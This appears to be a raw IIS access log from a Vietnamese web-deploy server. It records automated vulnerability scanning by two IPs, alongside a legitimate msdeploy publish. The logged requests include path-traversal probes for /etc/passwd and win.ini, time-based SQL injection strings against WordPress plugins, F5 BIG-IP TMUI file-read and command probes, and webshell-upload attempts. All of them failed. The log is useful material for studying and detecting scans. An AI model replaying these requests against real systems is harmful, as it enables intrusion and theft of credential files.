Mozilla/5.0+(Debian;+Linux+i686)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/129.0.0.0+Safari/537.36 - 404 12 0 35 2024-12-12 08:35:19 103.153.214.94 GET /index.php page=../../windows/win.ini 8172 - 206.238.196.225 Mozilla/5.0+(X11;+Ubuntu;+Linux+x86_64;+rv:128.0)+Gecko/20100101+Firefox/128.0 - 404 7 0 34 2024-12-12 08:35:19 103.153.214.94 GET /.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/windows/win.ini - 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_6_8)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/28.0.1500.44+Safari/537.36 - 400 0 0 37 2024-12-12 08:35:19 103.153.214.94 GET /index.php page=windows/win.ini 8172 - 206.238.196.225 Mozilla/5.0+(Debian;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/128.0.0.0+Safari/537.36 - 404 7 0 38 2024-12-12 08:35:19 103.153.214.94 GET /..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5cwindows/win.ini - 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/14.1.2+Safari/605.1.15 - 404 5 0 38 2024-12-12 08:35:19 103.153.214.94 GET /................windows/win.ini - 8172 - 206.238.196.225 Mozilla/5.0+(X11;+Linux+i686;+rv:123.0)+Gecko/20100101+Firefox/123.0 - 404 5 0 36 2024-12-12 08:35:19 103.153.214.94 GET /index.php page=windows/win.ini%00 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10.12;+rv:109.0)+Gecko/20100101+Firefox/115.0 - 404 7 0 54 2024-12-12 08:35:19 103.153.214.94 GET / page=..%2f..%2f..%2f..%2f..%2fwindows/win.ini 8172 - 206.238.196.225 Mozilla/5.0+(Kubuntu;+Linux+x86_64;+rv:123.0)+Gecko/20100101+Firefox/123.0 - 404 7 0 55 2024-12-12 08:35:19 103.153.214.94 GET /%5c%5c..%5c/..%5c/..%5c/..%5c/..%5c/..%5c/..%5c/..%5c/..%5c/windows/win.ini - 8172 - 206.238.196.225 Mozilla/5.0+(Debian;+Linux+i686)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/129.0.0.0+Safari/537.36 - 400 0 0 63 2024-12-12 08:35:19 103.153.214.94 GET /.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/windows/win.ini - 8172 - 206.238.196.225 Mozilla/5.0+(Knoppix;+Linux+i686)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/124.0.0.0+Safari/537.36 - 400 0 0 62 2024-12-12 08:35:19 103.153.214.94 GET / redirect=..%2f..%2f..%2f..%2fwindows/win.ini 8172 - 206.238.196.225 Mozilla/5.0+(Ubuntu;+Linux+i686)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/125.0.0.0+Safari/537.36 - 404 7 0 53 2024-12-12 08:35:19 103.153.214.94 GET / url=..%2f..%2f..%2f..%2f..%2f..%2fwindows/win.ini 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.2+Safari/605.1.15 - 404 7 0 58 2024-12-12 08:35:40 103.153.214.94 POST /casa/nodes/thumbprints - 8172 - 156.251.25.152 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.5+Safari/605.5.27 - 404 7 0 200 2024-12-12 08:35:41 103.153.214.94 POST /logupload logMetaData=%7B%22itrLogPath%22%3A%20%22..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fhttpd%2Fhtml%2Fwsgi_log_upload%22%2C%20%22logFileType%22%3A%20%22log_upload_wsgi.py%22%2C%20%22workloadID%22%3A%20%222%22%7D 8172 - 156.251.25.152 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/16.1+Safari/605.1.15 https://bcvt.kontum.gov.vn:8172 404 7 0 242 2024-12-12 08:35:46 103.153.214.94 POST /xmlrpc/pingback - 8172 - 206.238.196.225 Mozilla/5.0+(Debian;+Linux+i686)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/120.0.0.0+Safari/537.36 - 404 7 0 56 2024-12-12 08:35:55 103.153.214.94 POST /ui/h5-vsan/rest/proxy/service/com.vmware.vsan.client.services.capability.VsanCapabilityProvider/getClusterCapabilityData - 8172 - 156.251.25.152 Mozilla/5.0+(Knoppix;+Linux+i686)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/122.0.0.0+Safari/537.36 - 404 7 0 220 2024-12-12 08:38:09 103.153.214.94 POST /api/v4/ci/lint include_merged_yaml=true 8172 - 156.251.25.152 Mozilla/5.0+(Ubuntu;+Linux+i686)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/118.0.0.0+Safari/537.36 - 404 7 0 217 2024-12-12 08:41:03 103.153.214.94 POST /AdminService/urest/v1/LogonResource - 8172 - 156.251.25.152 Mozilla/5.0+(Ubuntu;+Linux+i686)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/129.0.0.0+Safari/537.36 - 404 7 0 204 2024-12-12 08:42:00 103.153.214.94 POST /api/v1/method.callAnon/getPasswordPolicy - 8172 - 156.251.25.152 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.1+Safari/605.7.21 - 404 7 0 224 2024-12-12 08:42:02 103.153.214.94 GET /cgi-bin/cgiServer worker=IndexNew 8172 - 156.251.25.152 Mozilla/5.0+(Ubuntu;+Linux+i686)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/128.0.0.0+Safari/537.36 - 404 7 0 200 2024-12-12 08:43:25 103.153.214.94 GET /wp-admin/admin-ajax.php action=likebtn_prx&likebtn_q=aHR0cDovL2xpa2VidG4uY29tLm9hc3QubWU=" 8172 - 156.251.25.152 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64;+rv:92.0)+Gecko/20100101+Firefox/92.0 - 404 7 0 214 2024-12-12 08:44:19 103.153.214.94 POST /lucee/admin/imgProcess.cfm file=/whatever 8172 - 156.251.25.152 Mozilla/5.0+(ZZ;+Linux+i686)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/127.0.0.0+Safari/537.36 - 404 7 0 206 2024-12-12 08:44:24 103.153.214.94 POST /lucee/admin/imgProcess.cfm file=/../../../context/2q6JQcsQ30xj2kKZFL9GmsAg61J.cfm 8172 - 156.251.25.152 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/93.0.4577.0+Safari/537.36 - 404 7 0 213 2024-12-12 08:44:27 103.153.214.94 POST /lucee/2q6JQcsQ30xj2kKZFL9GmsAg61J.cfm - 8172 - 156.251.25.152 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/108.0.0.0+Safari/537.36 - 404 7 0 199 2024-12-12 08:44:46 103.153.214.94 POST / - 8172 - 156.251.25.152 Mozilla/5.0+(X11;+Ubuntu;+Linux+aarch64;+rv:90.0)+Gecko/20100101+Firefox/90.0 - 404 7 0 227 2024-12-12 08:44:49 103.153.214.94 POST / - 8172 - 156.251.25.152 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.4.1+Safari/605.6.16 - 404 7 0 200 2024-12-12 08:46:21 103.153.214.94 GET / - 8172 - 156.251.25.152 Mozilla/5.0+(SS;+Linux+i686)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/118.0.0.0+Safari/537.36 - 404 7 0 211 2024-12-12 08:46:24 103.153.214.94 POST /analytics/telemetry/ph/api/hyper/send _c&_i=test 8172 - 156.251.25.152 Mozilla/5.0+(X11;+Linux+i686)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/124.0.0.0+Safari/537.36 - 404 7 0 204 2024-12-12 08:48:48 103.153.214.94 GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp fileName=/etc/passwd 8172 - 156.251.25.152 Mozilla/5.0+(Fedora;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/122.0.0.0+Safari/537.36 - 404 5 0 207 2024-12-12 08:48:51 103.153.214.94 GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp fileName=/etc/f5-release 8172 - 156.251.25.152 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+15_7_9)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.3.4+Safari/605.1.15 - 404 5 0 222 2024-12-12 08:48:54 103.153.214.94 GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp fileName=/config/bigip.license 8172 - 156.251.25.152 Mozilla/5.0+(Knoppix;+Linux+i686;+rv:123.0)+Gecko/20100101+Firefox/123.0 - 404 5 0 237 2024-12-12 08:49:00 103.153.214.94 POST /tmui/locallb/workspace/tmshCmd.jsp - 8172 - 156.251.25.152 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/108.0.0.0+Safari/537.36 - 404 7 0 226 2024-12-12 08:49:03 103.153.214.94 POST /tmui/locallb/workspace/fileSave.jsp - 8172 - 156.251.25.152 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.5+Mobile/15E148+Safari/604.1 - 404 7 0 247 2024-12-12 08:49:06 103.153.214.94 POST /tmui/locallb/workspace/tmshCmd.jsp - 8172 - 156.251.25.152 Mozilla/5.0+(SS;+Linux+i686;+rv:125.0)+Gecko/20100101+Firefox/125.0 - 404 7 0 208 2024-12-12 08:49:09 103.153.214.94 POST /tmui/locallb/workspace/tmshCmd.jsp - 8172 - 156.251.25.152 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/90.0.4430.212+Safari/537.36 - 404 7 0 215 2024-12-12 08:49:26 103.153.214.94 POST /mgmt/shared/authn/login - 8172 - 156.251.25.152 Mozilla/5.0+(Kubuntu;+Linux+i686)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/121.0.0.0+Safari/537.36 - 404 7 0 198 2024-12-12 08:50:21 103.153.214.94 POST /wp-admin/admin-ajax.php - 8172 - 156.251.25.152 Mozilla/5.0+(CentOS;+Linux+i686;+rv:123.0)+Gecko/20100101+Firefox/123.0 - 404 7 0 199 2024-12-12 08:50:22 103.153.214.94 POST /wp-admin/admin-ajax.php - 8172 - 156.251.25.152 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10.15;+rv:102.0)+Gecko/20100101+Firefox/102.0 - 404 7 0 224 2024-12-12 08:52:59 103.153.214.94 POST /WebReport/ReportServer op=svginit&cmd=design_save_svg&filePath=chartmapsvg/../../../../WebReport/oXpbLg0H.jsp 8172 - 206.238.196.225 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/52.0.2743.82+Safari/537.36 - 404 7 0 49 2024-12-12 08:53:05 103.153.214.94 POST /wp-admin/admin-ajax.php action=pollinsertvalues 8172 - 156.251.25.152 Mozilla/5.0+(Knoppix;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/127.0.0.0+Safari/537.36 - 404 7 0 203 2024-12-12 08:53:25 103.153.214.94 GET /WebReport/oXpbLg0H.jsp - 8172 - 206.238.196.225 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/96.0.4664.93+Safari/537.36 - 404 7 0 101 2024-12-12 08:54:29 103.153.214.94 POST /wp-json/pie/v1/login - 8172 - 156.251.25.152 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/46.0.2486.0+Safari/537.36+Edge/13.10586 - 404 7 0 213 2024-12-12 08:58:01 103.153.214.94 GET /wp-admin/admin-ajax.php action=get_question&question_id=1%20AND%20(SELECT%207242%20FROM%20(SELECT(SLEEP(7)))HQYx) 8172 - 156.251.25.152 Mozilla/5.0+(X11;+Ubuntu;+Linux+i686;+rv:24.0)+Gecko/20100101+Firefox/24.0 - 404 7 0 205 2024-12-12 08:58:18 103.153.214.94 GET /forum/ subscribe_topic=1%20union%20select%201%20and%20sleep(6) 8172 - 156.251.25.152 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/58.0.3029.110+Safari/537.36+Edge/16.16299 - 404 7 0 201 2024-12-12 08:58:19 103.153.214.94 GET /wp-content/plugins/wc-multivendor-marketplace/readme.txt - 8172 - 156.251.25.152 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/43.0.2357.124+Safari/537.36 - 404 7 0 209 2024-12-12 08:58:26 103.153.214.94 POST /wp-admin/admin-ajax.php action=uploadFontIcon 8172 - 156.251.25.152 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.1+Safari/605.7.21 - 404 7 0 233 2024-12-12 08:58:28 103.153.214.94 POST /wp-comments-post.php - 8172 - 156.251.25.152 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64;+rv:86.0)+Gecko/20100101+Firefox/86.0 - 404 7 0 204 2024-12-12 08:58:31 103.153.214.94 GET /wp-content/uploads/kaswara/fonts_icon/tukctj/es.php - 8172 - 156.251.25.152 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+12)+AppleWebKit/616.19+(KHTML,+like+Gecko)+Version/17.7.17+Safari/616.19 - 404 7 0 233 2024-12-12 08:58:32 103.153.214.94 GET /wp-content/plugins/imagements/images/2q6jqnhqpscljrftc62qa1bgear.php - 8172 - 156.251.25.152 Mozilla/5.0+(X11;+U;+Linux+i686;+pt-BR;+rv:1.9.0.3)+Gecko/2008092510+Ubuntu/8.04+(hardy)+Firefox/3.0.3 - 404 7 0 218 2024-12-12 08:58:34 103.153.214.94 POST /wp-admin/admin.php page=contest-gallery/index.php&users_management=true&option_id=1 8172 - 156.251.25.152 Mozilla/5.0+(CentOS;+Linux+i686)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/121.0.0.0+Safari/537.36 - 404 7 0 196 2024-12-12 08:58:34 103.153.214.94 GET /wp-admin/options.php - 8172 - 156.251.25.152 Mozilla/5.0+(X11;+Linux+x86_64;+rv:127.0)+Gecko/20100101+Firefox/127.0 something 404 7 0 226 2024-12-12 08:58:38 103.153.214.94 GET /wp-content/plugins/wp-statistics/readme.txt - 8172 - 156.251.25.152 Mozilla/5.0+(Windows+NT+6.1;+Win64;+x64;+rv:84.0)+Gecko/20100101+Firefox/84.0 - 404 7 0 217 2024-12-12 08:58:42 103.153.214.94 GET /wp-admin/admin.php page=wps_pages_page&ID=0+AND+(SELECT+1+FROM+(SELECT(SLEEP(7)))test)&type=home 8172 - 156.251.25.152 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+11_2_3)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17+Safari/605.1.15 - 404 7 0 208 2024-12-12 08:59:14 103.153.214.94 GET /wp-admin/admin-ajax.php action=ays_sccp_results_export_file&sccp_id[]=3)%20AND%20(SELECT%205921%20FROM%20(SELECT(SLEEP(6)))LxjM)%20AND%20(7754=775&type=json 8172 - 156.251.25.152 Mozilla/5.0+(SS;+Linux+x86_64;+rv:125.0)+Gecko/20100101+Firefox/125.0 - 404 7 0 225 2024-12-12 08:59:56 103.153.214.94 POST /wp-admin/admin-ajax.php action=rtec_send_unregister_link 8172 - 156.251.25.152 Mozilla/5.0+(Fedora;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/124.0.0.0+Safari/537.36 - 404 7 0 208 2024-12-12 09:00:37 103.153.214.94 POST /wp-admin/admin-ajax.php - 8172 - 156.251.25.152 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+14_3_1)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.2+Safari/605.1.15 - 404 7 0 206 2024-12-12 09:00:42 103.153.214.94 GET /wp-content/uploads/workreap-temp/2q6JQiSQudumGwULCEDYlM2VEwF.php - 8172 - 156.251.25.152 Mozilla/5.0+(Kubuntu;+Linux+x86_64;+rv:122.0)+Gecko/20100101+Firefox/122.0 - 404 7 0 220 2024-12-12 09:01:36 103.153.214.94 GET /wp-admin/admin-ajax.php action=mec_load_single_page&time=1))%20UNION%20SELECT%20sleep(6)%20--%20g 8172 - 156.251.25.152 Mozilla/5.0+(CentOS;+Linux+i686)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/125.0.0.0+Safari/537.36 - 404 7 0 198 2024-12-12 09:01:44 103.153.214.94 POST /eps/api/resourceOperations/upload token=DCB283C82873EAF4E9BF67521821649A 8172 - 206.238.196.225 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64;+rv:109.0)+Gecko/20100101+Firefox/116.0 - 404 7 0 45 2024-12-12 09:01:44 103.153.214.94 POST /bic/ssoService/v1/applyCT - 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.3.1+Safari/605.1.15 - 404 7 0 56 2024-12-12 09:05:45 103.153.214.94 GET /DownLoadCourseware url=VHmj0PAATTP2HJBPAATTPcyRcHb6hPAATTP2HJFPAATTP59XObqwUZaPAATTP2HJBPAATTP6EvXjT 8172 - 206.238.196.225 Mozilla/5.0+(CentOS;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/118.0.0.0+Safari/537.36 - 404 7 0 37 2024-12-12 09:05:58 103.153.214.94 HEAD /msdeploy.axd site=kiemkegpmb.gdtsolutions.vn 8172 kiemke 116.96.77.140 - - 200 0 0 39 2024-12-12 09:05:58 103.153.214.94 HEAD /msdeploy.axd site=kiemkegpmb.gdtsolutions.vn 8172 kiemke 116.96.77.140 - - 200 0 0 53 2024-12-12 09:06:00 103.153.214.94 POST /msdeploy.axd site=kiemkegpmb.gdtsolutions.vn 8172 kiemke 116.96.77.140 - - 200 0 0 509 2024-12-12 09:06:00 103.153.214.94 POST /msdeploy.axd site=kiemkegpmb.gdtsolutions.vn 8172 kiemke 116.96.77.140 VS17.0:PublishDialog:WTE17.11.231.19466;sid=eff0bba2-06c7-45cd-ad01-4fdc6b24023f;op=Sync - 200 0 0 356 2024-12-12 09:06:10 103.153.214.94 HEAD /msdeploy.axd site=kiemkegpmb.gdtsolutions.vn 8172 kiemke 116.96.77.140 - - 200 0 0 28 2024-12-12 09:06:10 103.153.214.94 HEAD /msdeploy.axd site=kiemkegpmb.gdtsolutions.vn 8172 kiemke 116.96.77.140 - - 200 0 0 25 2024-12-12 09:06:11 103.153.214.94 POST /msdeploy.axd site=kiemkegpmb.gdtsolutions.vn 8172 kiemke 116.96.77.140 VS17.0:PublishDialog:WTE17.11.231.19466;sid=48324563-9147-456b-9f33-fc45e67a5161;op=Sync - 200 0 0 912 2024-12-12 09:06:11 103.153.214.94 POST /msdeploy.axd site=kiemkegpmb.gdtsolutions.vn 8172 kiemke 116.96.77.140 - - 200 0 0 1025 2024-12-12 09:06:11 103.153.214.94 HEAD /msdeploy.axd site=kiemkegpmb.gdtsolutions.vn 8172 kiemke 116.96.77.140 - - 200 0 0 25 2024-12-12 09:06:12 103.153.214.94 POST /msdeploy.axd site=kiemkegpmb.gdtsolutions.vn 8172 kiemke 116.96.77.140 VS17.0:PublishDialog:WTE17.11.231.19466;sid=48324563-9147-456b-9f33-fc45e67a5161;op=Sync - 200 0 0 999 2024-12-12 09:06:12 103.153.214.94 POST /msdeploy.axd site=kiemkegpmb.gdtsolutions.vn 8172 kiemke 116.96.77.140 - - 200 0 0 1111 2024-12-12 09:06:37 103.153.214.94 GET / 5ge4bd=1 8172 - 206.238.196.225 Mozilla/5.0+(Ubuntu;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/123.0.0.0+Safari/537.36 - 404 7 0 38 2024-12-12 09:06:59 103.153.214.94 GET / 5ge4bd=1 8172 - 206.238.196.225 Mozilla/5.0+(Fedora;+Linux+i686;+rv:123.0)+Gecko/20100101+Firefox/123.0 - 404 7 0 60 2024-12-12 09:08:12 103.153.214.94 POST /wp-admin/admin-ajax.php - 8172 - 156.251.25.152 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.0.1+Mobile/15E148+Safari/604.1 - 404 7 0 211 2024-12-12 09:09:41 103.153.214.94 POST /run - 8172 - 156.251.25.152 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/105.0.0.0+Safari/537.36 - 404 7 0 204 2024-12-12 09:09:41 103.153.214.94 GET /servlet/sduty/getSdutyTree param=child&target=1&codesetid=1&codeitemid=1%27+UNION+ALL+SELECT+NULL%2CCHAR%28113%29%2BCHAR%28120%29%2BCHAR%28106%29%2BCHAR%28112%29%2BCHAR%28113%29%2BCHAR%28106%29%2BCHAR%28119%29%2BCHAR%2885%29%2BCHAR%2873%29%2BCHAR%2887%29%2BCHAR%2899%29%2BCHAR%2875%29%2BCHAR%28116%29%2BCHAR%2872%29%2BCHAR%28113%29%2BCHAR%28104%29%2BCHAR%28107%29%2BCHAR%2889%29%2BCHAR%28115%29%2BCHAR%28108%29%2BCHAR%2873%29%2BCHAR%2884%29%2BCHAR%2869%29%2BCHAR%2873%29%2BCHAR%2875%29%2BCHAR%2883%29%2BCHAR%2898%29%2BCHAR%28116%29%2BCHAR%28120%29%2BCHAR%2889%29%2BCHAR%2884%29%2BCHAR%2882%29%2BCHAR%28120%29%2BCHAR%2884%29%2BCHAR%28116%29%2BCHAR%2888%29%2BCHAR%28112%29%2BCHAR%2887%29%2BCHAR%2873%29%2BCHAR%28109%29%2BCHAR%28104%29%2BCHAR%2887%29%2BCHAR%28102%29%2BCHAR%2897%29%2BCHAR%2877%29%2BCHAR%28113%29%2BCHAR%28118%29%2BCHAR%28106%29%2BCHAR%28122%29%2BCHAR%28113%29%2CNULL%2CNULL--+Iprd 8172 - 206.238.196.225 Mozilla/5.0+(Knoppix;+Linux+i686;+rv:123.0)+Gecko/20100101+Firefox/123.0 - 404 7 0 43 2024-12-12 09:11:14 103.153.214.94 POST /druid/indexer/v1/sampler - 8172 - 156.251.25.152 Mozilla/5.0+(SS;+Linux+x86_64;+rv:124.0)+Gecko/20100101+Firefox/124.0 - 404 7 0 221 2024-12-12 09:11:17 103.153.214.94 GET /etc/passwd - 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.2+Safari/605.3.17 - 404 7 0 40 2024-12-12 09:11:17 103.153.214.94 GET /����/����/����/����/����/����/����/����/etc/passwd - 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.4+ZOE/2+Safari/605.1.15 - 404 12 0 43 2024-12-12 09:11:17 103.153.214.94 GET /etc/passwd - 8172 - 206.238.196.225 Mozilla/5.0+(Ubuntu;+Linux+i686)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/127.0.0.0+Safari/537.36 - 404 7 0 42 2024-12-12 09:11:17 103.153.214.94 GET /etc/passwd - 8172 - 206.238.196.225 Mozilla/5.0+(Fedora;+Linux+i686;+rv:121.0)+Gecko/20100101+Firefox/121.0 - 404 7 0 34 2024-12-12 09:11:17 103.153.214.94 GET /.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/etc/passwd - 8172 - 206.238.196.225 Mozilla/5.0+(ZZ;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/118.0.0.0+Safari/537.36 - 400 0 0 42 2024-12-12 09:11:17 103.153.214.94 GET /................etc/passwd - 8172 - 206.238.196.225 Mozilla/5.0+(CentOS;+Linux+x86_64;+rv:125.0)+Gecko/20100101+Firefox/125.0 - 404 5 0 39 2024-12-12 09:11:17 103.153.214.94 GET /..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5cetc/passwd - 8172 - 206.238.196.225 Mozilla/5.0+(Windows+NT+6.1;+Win64;+x64;+rv:85.0)+Gecko/20100101+Firefox/85.0 - 404 5 0 41 2024-12-12 09:11:35 103.153.214.94 GET /index.php page=....//....//etc/passwd 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+14_4_1)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.3.1+Safari/605.1.15 - 404 7 0 56 2024-12-12 09:11:35 103.153.214.94 GET /index.php page=etc/passwd%00 8172 - 206.238.196.225 Mozilla/5.0+(X11;+Linux+i686)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/123.0.0.0+Safari/537.36 - 404 7 0 38 2024-12-12 09:11:35 103.153.214.94 GET /index.php page=etc/passwd 8172 - 206.238.196.225 Mozilla/5.0+(ZZ;+Linux+i686;+rv:127.0)+Gecko/20100101+Firefox/127.0 - 404 7 0 38 2024-12-12 09:11:35 103.153.214.94 GET /index.php page=../../etc/passwd 8172 - 206.238.196.225 Mozilla/5.0+(CentOS;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/121.0.0.0+Safari/537.36 - 404 7 0 46 2024-12-12 09:11:35 103.153.214.94 GET /����/����/����/etc/passwd - 8172 - 206.238.196.225 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/124.0.0.0+Whale/3.26.244.21+Safari/537.36 - 404 12 0 43 2024-12-12 09:11:52 103.153.214.94 GET /wp-content/plugins/pie-register/readme.txt - 8172 - 156.251.25.152 Mozilla/5.0+(Fedora;+Linux+i686)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/122.0.0.0+Safari/537.36 - 404 7 0 227 2024-12-12 09:11:56 103.153.214.94 POST /login/ - 8172 - 156.251.25.152 Mozilla/5.0+(CentOS;+Linux+i686;+rv:125.0)+Gecko/20100101+Firefox/125.0 - 404 7 0 209 2024-12-12 09:12:02 103.153.214.94 GET /wp-admin/profile.php - 8172 - 156.251.25.152 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.2+Safari/605.1.1 - 404 7 0 229 2024-12-12 09:15:35 103.153.214.94 POST /admin/ - 8172 - 156.251.25.152 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10.15;+rv:128.0)+Gecko/20100101+Firefox/128.0 - 404 7 0 210 2024-12-12 09:15:37 103.153.214.94 POST /AurallRECMonitor/services/svc-login.php - 8172 - 156.251.25.152 Mozilla/5.0+(Knoppix;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/123.0.0.0+Safari/537.36 - 404 7 0 204 2024-12-12 09:16:04 103.153.214.94 GET /data/settings/settings.xml - 8172 - 156.251.25.152 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/16.1+Safari/605.1.15 - 404 7 0 201 2024-12-12 09:16:06 103.153.214.94 POST /webtools/control/SOAPService - 8172 - 156.251.25.152 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64;+rv:107.0)+Gecko/20100101+Firefox/107.0 - 404 7 0 211 2024-12-12 09:16:36 103.153.214.94 GET /owa/auth/x.js - 8172 - 156.251.25.152 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+11)+AppleWebKit/616.17+(KHTML,+like+Gecko)+Version/17.3.75+Safari/616.17 - 404 7 0 222 2024-12-12 09:17:07 103.153.214.94 GET /users/sign_in - 8172 - 206.238.196.225 Mozilla/5.0+(Kubuntu;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/124.0.0.0+Safari/537.36 - 404 7 0 58 2024-12-12 09:17:14 103.153.214.94 GET /api/v1/repos/search limit=1 8172 - 206.238.196.225 Mozilla/5.0+(CentOS;+Linux+i686)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/120.0.0.0+Safari/537.36 - 404 7 0 44 2024-12-12 09:17:17 103.153.214.94 POST /contactus.php - 8172 - 156.251.25.152 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/67.0.3396.99+Safari/537.36 - 404 7 0 226 2024-12-12 09:17:17 103.153.214.94 POST /contactus.php - 8172 - 156.251.25.152 